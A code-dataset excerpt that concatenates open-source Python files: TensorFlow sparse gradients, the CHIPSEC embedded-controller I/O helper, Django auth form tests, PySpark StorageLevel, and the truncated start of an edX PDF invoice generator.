assert isinstance(i.type.is_restrict_qualified(), bool)
assert i.type.is_restrict_qualified()
assert not j.type.is_restrict_qualified()
| bsd-2-clause |
a-doumoulakis/tensorflow | tensorflow/python/ops/sparse_grad.py | 61 | 10799 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in sparse_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable("SparseAddGrad")
ops.NotDifferentiable("SparseConcat")
ops.NotDifferentiable("SparseToDense")
@ops.RegisterGradient("SparseReorder")
def _SparseReorderGrad(op, unused_output_indices_grad, output_values_grad):
"""Gradients for the SparseReorder op.
Args:
op: the SparseReorder op
unused_output_indices_grad: the incoming gradients of the output indices
output_values_grad: the incoming gradients of the output values
Returns:
Gradient for each of the 3 input tensors:
(input_indices, input_values, input_shape)
The gradients for input_indices and input_shape are None.
"""
input_indices = op.inputs[0]
input_shape = op.inputs[2]
num_entries = array_ops.shape(input_indices)[0]
entry_indices = math_ops.range(num_entries)
sp_unordered = sparse_tensor.SparseTensor(
input_indices, entry_indices, input_shape)
sp_ordered = sparse_ops.sparse_reorder(sp_unordered)
inverted_permutation = array_ops.invert_permutation(sp_ordered.values)
return (None,
array_ops.gather(output_values_grad, inverted_permutation),
None)
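# Worked sketch (illustrative): if sorting yields sp_ordered.values == [1, 2, 0]
# (entry 1 lands first, then 2, then 0), invert_permutation gives [2, 0, 1], so
# input entry j receives output_values_grad at its sorted position.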
@ops.RegisterGradient("SparseAdd")
def _SparseAddGrad(op, *grads):
"""The backward operator for the SparseAdd op.
The SparseAdd op calculates A + B, where A, B, and the sum are all represented
as `SparseTensor` objects. This op takes in the upstream gradient w.r.t.
non-empty values of the sum, and outputs the gradients w.r.t. the non-empty
values of A and B.
Args:
op: the SparseAdd op
*grads: the incoming gradients, one element per output of `op`
Returns:
Gradient for each of the 6 input tensors of SparseAdd:
(a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
The gradients for the indices, shapes, and the threshold are None.
"""
val_grad = grads[1]
a_indices = op.inputs[0]
b_indices = op.inputs[3]
sum_indices = op.outputs[0]
# NOTE: we do not need to take `thresh` into account, since it simply affects
# the non-zero elements of the sum, and we will peek into `sum_indices` in the
# gradient op.
# pylint: disable=protected-access
a_val_grad, b_val_grad = gen_sparse_ops._sparse_add_grad(val_grad, a_indices,
b_indices,
sum_indices)
a_val_grad.set_shape(op.inputs[1].get_shape())
b_val_grad.set_shape(op.inputs[4].get_shape())
# (a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
return (None, a_val_grad, None, None, b_val_grad, None, None)
@ops.RegisterGradient("SparseTensorDenseAdd")
def _SparseTensorDenseAddGrad(op, out_grad):
sp_indices = op.inputs[0]
# (sparse_indices, sparse_values, sparse_shape, dense)
return (None, array_ops.gather_nd(out_grad, sp_indices), None, out_grad)
@ops.RegisterGradient("SparseReduceSum")
def _SparseReduceSumGrad(op, out_grad):
"""Similar to gradient for the Sum Op (i.e. tf.reduce_sum())."""
sp_indices = op.inputs[0]
sp_shape = op.inputs[2]
output_shape_kept_dims = math_ops.reduced_shape(sp_shape, op.inputs[3])
out_grad_reshaped = array_ops.reshape(out_grad, output_shape_kept_dims)
scale = sp_shape // math_ops.to_int64(output_shape_kept_dims)
# (sparse_indices, sparse_values, sparse_shape, reduction_axes)
return (None, array_ops.gather_nd(out_grad_reshaped, sp_indices // scale),
None, None)
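# Worked sketch (illustrative): for dense_shape [2, 4] reduced over axis 1,
# output_shape_kept_dims is [2, 1] and scale is [1, 4]; a nonzero at index
# [1, 3] therefore gathers its gradient from out_grad_reshaped[1, 0].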
@ops.RegisterGradient("SparseTensorDenseMatMul")
def _SparseTensorDenseMatMulGrad(op, grad):
"""Gradients for the dense tensor in the SparseTensorDenseMatMul op.
If either input is complex, no gradient is provided.
Args:
op: the SparseTensorDenseMatMul op
grad: the incoming gradient
Returns:
Gradient for each of the 4 input tensors:
(sparse_indices, sparse_values, sparse_shape, dense_tensor)
The gradients for indices and shape are None.
Raises:
TypeError: When the two operands don't have the same type.
"""
a_indices, a_values, a_shape = op.inputs[:3]
b = op.inputs[3]
adj_a = op.get_attr("adjoint_a")
adj_b = op.get_attr("adjoint_b")
a_type = a_values.dtype.base_dtype
b_type = b.dtype.base_dtype
if a_type != b_type:
raise TypeError("SparseTensorDenseMatMul op received operands with "
"different types: ", a_type, " and ", b_type)
if a_type in (ops.dtypes.complex64, ops.dtypes.complex128):
raise NotImplementedError("SparseTensorDenseMatMul op does not support "
"complex gradients.")
# gradient w.r.t. dense
b_grad = gen_sparse_ops._sparse_tensor_dense_mat_mul( # pylint: disable=protected-access
a_indices, a_values, a_shape, grad, adjoint_a=not adj_a)
if adj_b:
b_grad = array_ops.transpose(b_grad)
# gradient w.r.t. sparse values
rows = a_indices[:, 0]
cols = a_indices[:, 1]
# TODO(zongheng, ebrevdo): add conjugates in the right places when complex
# values are allowed.
# TODO(zongheng): these gather calls could potentially duplicate rows/cols in
# memory. If there is a need, we should look into implementing this more
# intelligently to avoid duplicating data.
parts_a = array_ops.gather(grad, rows if not adj_a else cols)
parts_b = array_ops.gather(b if not adj_b else array_ops.transpose(b),
cols if not adj_a else rows)
a_values_grad = math_ops.reduce_sum(parts_a * parts_b, reduction_indices=1)
# gradients w.r.t. (a_indices, a_values, a_shape, b)
return (None, a_values_grad, None, b_grad)
@ops.RegisterGradient("SparseDenseCwiseAdd")
def _SparseDenseCwiseAddGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseDenseCwiseAdd is currently not"
" implemented yet.")
def _SparseDenseCwiseMulOrDivGrad(op, grad, is_mul):
"""Common code for SparseDenseCwise{Mul,Div} gradients."""
x_indices = op.inputs[0]
x_shape = op.inputs[2]
y = op.inputs[3]
y_shape = math_ops.to_int64(array_ops.shape(y))
num_added_dims = array_ops.expand_dims(
array_ops.size(x_shape) - array_ops.size(y_shape), 0)
augmented_y_shape = array_ops.concat(
[array_ops.ones(num_added_dims, ops.dtypes.int64), y_shape], 0)
scaling = x_shape // augmented_y_shape
scaled_indices = x_indices // scaling
scaled_indices = array_ops.slice(scaled_indices,
array_ops.concat([[0], num_added_dims], 0),
[-1, -1])
dense_vals = array_ops.gather_nd(y, scaled_indices)
if is_mul:
dx = grad * dense_vals
dy_val = grad * op.inputs[1]
else:
dx = grad / dense_vals
dy_val = grad * (-op.inputs[1] / math_ops.square(dense_vals))
# indices can repeat after scaling, so we can't use sparse_to_dense().
dy = sparse_ops.sparse_add(
array_ops.zeros_like(y),
sparse_tensor.SparseTensor(scaled_indices, dy_val, y_shape))
# (sp_indices, sp_vals, sp_shape, dense)
return (None, dx, None, dy)
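# Broadcasting sketch (illustrative): x with dense_shape [2, 3, 4] against y of
# shape [4] gives augmented_y_shape [1, 1, 4] and scaling [2, 3, 1]; sparse
# index [1, 2, 3] scales to [0, 0, 3], slicing off the two added dims leaves
# [3], so the matching dense value is y[3].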
@ops.RegisterGradient("SparseDenseCwiseMul")
def _SparseDenseCwiseMulGrad(op, grad):
"""Gradients for SparseDenseCwiseMul."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, True)
@ops.RegisterGradient("SparseDenseCwiseDiv")
def _SparseDenseCwiseDivGrad(op, grad):
"""Gradients for SparseDenseCwiseDiv."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, False)
@ops.RegisterGradient("SparseSoftmax")
def _SparseSoftmaxGrad(op, grad):
"""Gradients for SparseSoftmax.
The calculation is the same as SoftmaxGrad:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
where we now only operate on the non-zero values present in the SparseTensors.
Args:
op: the SparseSoftmax op.
grad: the upstream gradient w.r.t. the non-zero SparseSoftmax output values.
Returns:
Gradients w.r.t. the input (sp_indices, sp_values, sp_shape).
"""
indices, shape = op.inputs[0], op.inputs[2]
out_vals = op.outputs[0]
sp_output = sparse_tensor.SparseTensor(indices, out_vals, shape)
sp_grad = sparse_tensor.SparseTensor(indices, grad, shape)
sp_product = sparse_tensor.SparseTensor(
indices, sp_output.values * sp_grad.values, shape)
# [..., B, 1], dense.
sum_reduced = -sparse_ops.sparse_reduce_sum(sp_product, [-1], keep_dims=True)
# sparse [..., B, C] + dense [..., B, 1] with broadcast; outputs sparse.
sp_sum = sparse_ops.sparse_dense_cwise_add(sp_grad, sum_reduced)
grad_x = sp_sum.values * sp_output.values
return [None, grad_x, None]
@ops.RegisterGradient("SparseSparseMaximum")
def _SparseSparseMaximumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMaximum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseSparseMinimum")
def _SparseSparseMinimumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMinimum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseFillEmptyRows")
def _SparseFillEmptyRowsGrad(op, unused_grad_output_indices, output_grad_values,
unused_grad_empty_row_indicator,
unused_grad_reverse_index_map):
"""Gradients for SparseFillEmptyRows."""
reverse_index_map = op.outputs[3]
# pylint: disable=protected-access
d_values, d_default_value = gen_sparse_ops._sparse_fill_empty_rows_grad(
reverse_index_map=reverse_index_map, grad_values=output_grad_values)
# d_indices, d_values, d_dense_shape, d_default_value.
return [None, d_values, None, d_default_value]
| apache-2.0 |
chipsecintel/chipsec | source/tool/chipsec/hal/ec.py | 3 | 6172 | #!/usr/local/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2016, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------
"""
Access to Embedded Controller (EC)
Usage:
>>> write_command( command )
>>> write_data( data )
>>> read_data()
>>> read_memory( offset )
>>> write_memory( offset, data )
>>> read_memory_extended( word_offset )
>>> write_memory_extended( word_offset, data )
>>> read_range( start_offset, size )
>>> write_range( start_offset, buffer )
"""
from chipsec.logger import *
from chipsec.cfg.common import *
#
# Embedded Controller ACPI ports
#
IO_PORT_EC_DATA = 0x62
IO_PORT_EC_COMMAND = 0x66
IO_PORT_EC_STATUS = 0x66
IO_PORT_EC_INDEX = 0x380
IO_PORT_EC_INDEX_ADDRH = (IO_PORT_EC_INDEX + 0x1)
IO_PORT_EC_INDEX_ADDRL = (IO_PORT_EC_INDEX + 0x2)
IO_PORT_EC_INDEX_DATA = (IO_PORT_EC_INDEX + 0x3)
EC_STS_OBF = 0x01 # EC Output buffer full
EC_STS_IBF = 0x02 # EC Input buffer full
#
# Embedded Controller ACPI commands
# These commands should be submitted to EC ACPI I/O ports
#
EC_COMMAND_ACPI_READ = 0x080 # Read EC ACPI memory
EC_COMMAND_ACPI_WRITE = 0x081 # Write EC ACPI memory
EC_COMMAND_ACPI_LOCK = 0x082 # Lock EC for burst use
EC_COMMAND_ACPI_UNLOCK = 0x083 # Unlock EC from burst use
EC_COMMAND_ACPI_QUERY = 0x084 # Query EC event
EC_COMMAND_ACPI_READ_EXT = 0x0F0 # Read EC ACPI extended memory
EC_COMMAND_ACPI_WRITE_EXT = 0x0F1 # Write EC ACPI extended memory
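# Port-level sketch of one ACPI read transaction (illustrative; this is the
# sequence read_memory() below drives through cs.io, with EC_STS_IBF/EC_STS_OBF
# polled on the status port 0x66 before each step):
#   out 0x66, 0x80    ; EC_COMMAND_ACPI_READ to the command port
#   out 0x62, offset  ; target offset in EC ACPI memory to the data port
#   in  0x62          ; the byte at 'offset' is returned on the data port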
class EC:
def __init__( self, cs ):
self.cs = cs
#
# EC ACPI memory access
#
# Wait for EC input buffer empty
def _wait_ec_inbuf_empty( self ):
to = 1000
while (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_IBF) and to: to = to - 1
return to != 0  # False indicates the wait timed out
# Wait for EC output buffer full
def _wait_ec_outbuf_full( self ):
to = 1000
while not ( self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_OBF ) and to: to = to - 1
return to != 0  # False indicates the wait timed out
def write_command( self, command ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_COMMAND, command )
def write_data( self, data ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_DATA, data )
def read_data( self ):
if not self._wait_ec_outbuf_full(): return None
return self.cs.io.read_port_byte( IO_PORT_EC_DATA )
def read_memory( self, offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( offset )
return self.read_data()
def write_memory( self, offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( offset )
return self.write_data( data )
def read_memory_extended( self, word_offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_READ_EXT )
self.write_data( word_offset >> 8 )
return self.read_data()
def write_memory_extended( self, word_offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_WRITE_EXT )
self.write_data( word_offset >> 8 )
return self.write_data( data )
def read_range( self, start_offset, size ):
buffer = [chr(0xFF)]*size
#self.write_command( EC_COMMAND_ACPI_READ )
for i in range(size):
#self.write_data( start_offset + i )
#buffer[i] = chr( self.read_data() )
if start_offset + i < 0x100:
buffer[i] = chr( self.read_memory( start_offset + i ) )
else:
buffer[i] = chr( self.read_memory_extended( start_offset + i ) )
if logger().VERBOSE:
logger().log( "[ec] read EC memory from offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return buffer
def write_range( self, start_offset, buffer ):
size = len(buffer)
for i in range(size):
self.write_memory( start_offset + i, ord(buffer[i]) )
if logger().VERBOSE:
logger().log( "[ec] write EC memory to offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return True
#
# EC Index I/O access
#
def read_idx( self, offset ):
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
value = self.cs.io.read_port_byte( IO_PORT_EC_INDEX_DATA )
if logger().HAL: logger().log( "[ec] index read: offset 0x%02X > 0x%02X:" % (offset, value) )
return value
def write_idx( self, offset, value ):
if logger().HAL: logger().log( "[ec] index write: offset 0x%02X < 0x%02X:" % (offset, value) )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_DATA, value & 0xFF )
return True
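# Minimal usage sketch (illustrative comments; 'cs' is assumed to be an
# initialized chipsec chipset object with a working port I/O helper, which
# the framework normally constructs for HAL components):
#   ec = EC(cs)
#   byte0 = ec.read_memory(0x00)       # EC ACPI memory, offsets < 0x100
#   page = ec.read_range(0x00, 0x10)   # first 16 bytes as a char list
#   ec.write_idx(0x100, 0xAA)          # index I/O via ports 0x380-0x383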
| gpl-2.0 |
pwhelan/djshouts | django/contrib/auth/tests/forms.py | 97 | 9436 | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm, PasswordChangeForm, SetPasswordForm, UserChangeForm, PasswordResetForm
from django.db import connection
from django.test import TestCase
from django.utils import unittest
class UserCreationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'A user with that username already exists.'])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[u"The two password fields didn't match."])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
self.assertEqual(form['password2'].errors,
[u'This field is required.'])
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
def test_success(self):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(repr(u), '<User: [email protected]>')
class AuthenticationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'Please enter a correct username and password. Note that both fields are case-sensitive.'])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'This account is inactive.'])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
class SetPasswordFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
class PasswordChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[u'Your old password was entered incorrectly. Please enter it again.'])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(PasswordChangeForm(user, {}).fields.keys(),
['old_password', 'new_password1', 'new_password2'])
class UserChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
@unittest.skipIf(not connection.features.supports_joins, 'Requires JOIN support')
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
self.assertEqual(form['username'].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_bug_14242(self):
# A regression test, introduced by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
form = MyUserForm({})
class PasswordResetFormTest(TestCase):
fixtures = ['authtestdata.json']
def create_dummy_user(self):
"""creates a user and returns a tuple
(user_object, username, email)
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email':'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors,
[u'Enter a valid e-mail address.'])
def test_nonexistent_email(self):
# Test nonexistent email address
data = {'email':'[email protected]'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors,
{'email': [u"That e-mail address doesn't have an associated user account. Are you sure you've registered?"]})
def test_cleaned_data(self):
# Regression test
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['email'], email)
def test_bug_5605(self):
# bug #5605, preserve the case of the user name (before the @ in the
# email address) when creating a user.
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
# Tests that an inactive user cannot receive a password reset email.
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertFalse(form.is_valid())
| bsd-3-clause |
ConeyLiu/spark | python/pyspark/storagelevel.py | 32 | 2640 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__all__ = ["StorageLevel"]
class StorageLevel(object):
"""
Flags for controlling the storage of an RDD. Each StorageLevel records whether to use memory,
whether to drop the RDD to disk if it falls out of memory, whether to keep the data in memory
in a JAVA-specific serialized format, and whether to replicate the RDD partitions on multiple
nodes. Also contains static constants for some commonly used storage levels, such as MEMORY_ONLY.
Since the data is always serialized on the Python side, all the constants use the serialized
formats.
"""
def __init__(self, useDisk, useMemory, useOffHeap, deserialized, replication=1):
self.useDisk = useDisk
self.useMemory = useMemory
self.useOffHeap = useOffHeap
self.deserialized = deserialized
self.replication = replication
def __repr__(self):
return "StorageLevel(%s, %s, %s, %s, %s)" % (
self.useDisk, self.useMemory, self.useOffHeap, self.deserialized, self.replication)
def __str__(self):
result = ""
result += "Disk " if self.useDisk else ""
result += "Memory " if self.useMemory else ""
result += "OffHeap " if self.useOffHeap else ""
result += "Deserialized " if self.deserialized else "Serialized "
result += "%sx Replicated" % self.replication
return result
StorageLevel.DISK_ONLY = StorageLevel(True, False, False, False)
StorageLevel.DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
StorageLevel.MEMORY_ONLY = StorageLevel(False, True, False, False)
StorageLevel.MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
StorageLevel.MEMORY_AND_DISK = StorageLevel(True, True, False, False)
StorageLevel.MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
StorageLevel.OFF_HEAP = StorageLevel(True, True, True, False, 1)
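# Illustrative round-trip (comments only; the output follows directly from the
# constants and the __repr__/__str__ definitions above):
#   >>> str(StorageLevel.MEMORY_AND_DISK_2)
#   'Disk Memory Serialized 2x Replicated'
#   >>> repr(StorageLevel.DISK_ONLY)
#   'StorageLevel(True, False, False, False, 1)'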
| apache-2.0 |
angelapper/edx-platform | lms/djangoapps/shoppingcart/pdf.py | 22 | 18645 | """
Template for PDF Receipt/Invoice Generation
"""
import logging
from django.conf import settings
from django.utils.translation import ugettext as _
from PIL import Image
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import mm
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from xmodule.modulestore.django import ModuleI18nService
log = logging.getLogger("PDF Generation")
class NumberedCanvas(Canvas):
"""
Canvas child class with auto page-numbering.
"""
def __init__(self, *args, **kwargs):
"""
__init__
"""
Canvas.__init__(self, *args, **kwargs)
self._saved_page_states = []
def insert_page_break(self):
"""
Starts a new page.
"""
self._saved_page_states.append(dict(self.__dict__))
self._startPage()
def current_page_count(self):
"""
Returns the page count in the current pdf document.
"""
return len(self._saved_page_states) + 1
def save(self):
"""
Adds page numbering to each page (page x of y)
"""
num_pages = len(self._saved_page_states)
for state in self._saved_page_states:
self.__dict__.update(state)
if num_pages > 1:
self.draw_page_number(num_pages)
Canvas.showPage(self)
Canvas.save(self)
def draw_page_number(self, page_count):
"""
Draws the String "Page x of y" at the bottom right of the document.
"""
self.setFontSize(7)
self.drawRightString(
200 * mm,
12 * mm,
_("Page {page_number} of {page_count}").format(page_number=self._pageNumber, page_count=page_count)
)
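# Usage note (illustrative): callers build pages with insert_page_break()
# instead of Canvas.showPage(); save() then replays every saved page state and
# stamps "Page x of y" via draw_page_number() once the total count is known.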
class PDFInvoice(object):
"""
PDF Generation Class
"""
def __init__(self, items_data, item_id, date, is_invoice, total_cost, payment_received, balance):
"""
Accepts the following positional arguments
items_data - A list having the following items for each row.
item_description - String
quantity - Integer
list_price - float
discount - float
item_total - float
id - String
date - datetime
is_invoice - boolean - True (for invoice) or False (for Receipt)
total_cost - float
payment_received - float
balance - float
"""
# From settings
self.currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
self.logo_path = configuration_helpers.get_value("PDF_RECEIPT_LOGO_PATH", settings.PDF_RECEIPT_LOGO_PATH)
self.cobrand_logo_path = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_PATH", settings.PDF_RECEIPT_COBRAND_LOGO_PATH
)
self.tax_label = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID_LABEL", settings.PDF_RECEIPT_TAX_ID_LABEL)
self.tax_id = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID", settings.PDF_RECEIPT_TAX_ID)
self.footer_text = configuration_helpers.get_value("PDF_RECEIPT_FOOTER_TEXT", settings.PDF_RECEIPT_FOOTER_TEXT)
self.disclaimer_text = configuration_helpers.get_value(
"PDF_RECEIPT_DISCLAIMER_TEXT", settings.PDF_RECEIPT_DISCLAIMER_TEXT,
)
self.billing_address_text = configuration_helpers.get_value(
"PDF_RECEIPT_BILLING_ADDRESS", settings.PDF_RECEIPT_BILLING_ADDRESS
)
self.terms_conditions_text = configuration_helpers.get_value(
"PDF_RECEIPT_TERMS_AND_CONDITIONS", settings.PDF_RECEIPT_TERMS_AND_CONDITIONS
)
self.brand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_LOGO_HEIGHT_MM
) * mm
self.cobrand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
) * mm
# From Context
self.items_data = items_data
self.item_id = item_id
self.date = ModuleI18nService().strftime(date, 'SHORT_DATE')
self.is_invoice = is_invoice
self.total_cost = '{currency}{amount:.2f}'.format(currency=self.currency, amount=total_cost)
self.payment_received = '{currency}{amount:.2f}'.format(currency=self.currency, amount=payment_received)
self.balance = '{currency}{amount:.2f}'.format(currency=self.currency, amount=balance)
# initialize the pdf variables
self.margin = 15 * mm
self.page_width = letter[0]
self.page_height = letter[1]
self.min_clearance = 3 * mm
self.second_page_available_height = ''
self.second_page_start_y_pos = ''
self.first_page_available_height = ''
self.pdf = None
def is_on_first_page(self):
"""
Returns True if it's the first page of the pdf, False otherwise.
"""
return self.pdf.current_page_count() == 1
def generate_pdf(self, file_buffer):
"""
Takes in a buffer and puts the generated pdf into that buffer.
"""
self.pdf = NumberedCanvas(file_buffer, pagesize=letter)
self.draw_border()
y_pos = self.draw_logos()
self.second_page_available_height = y_pos - self.margin - self.min_clearance
self.second_page_start_y_pos = y_pos
y_pos = self.draw_title(y_pos)
self.first_page_available_height = y_pos - self.margin - self.min_clearance
y_pos = self.draw_course_info(y_pos)
y_pos = self.draw_totals(y_pos)
self.draw_footer(y_pos)
self.pdf.insert_page_break()
self.pdf.save()
def draw_border(self):
"""
Draws a big border around the page leaving a margin of 15 mm on each side.
"""
self.pdf.setStrokeColorRGB(0.5, 0.5, 0.5)
self.pdf.setLineWidth(0.353 * mm)
self.pdf.rect(self.margin, self.margin,
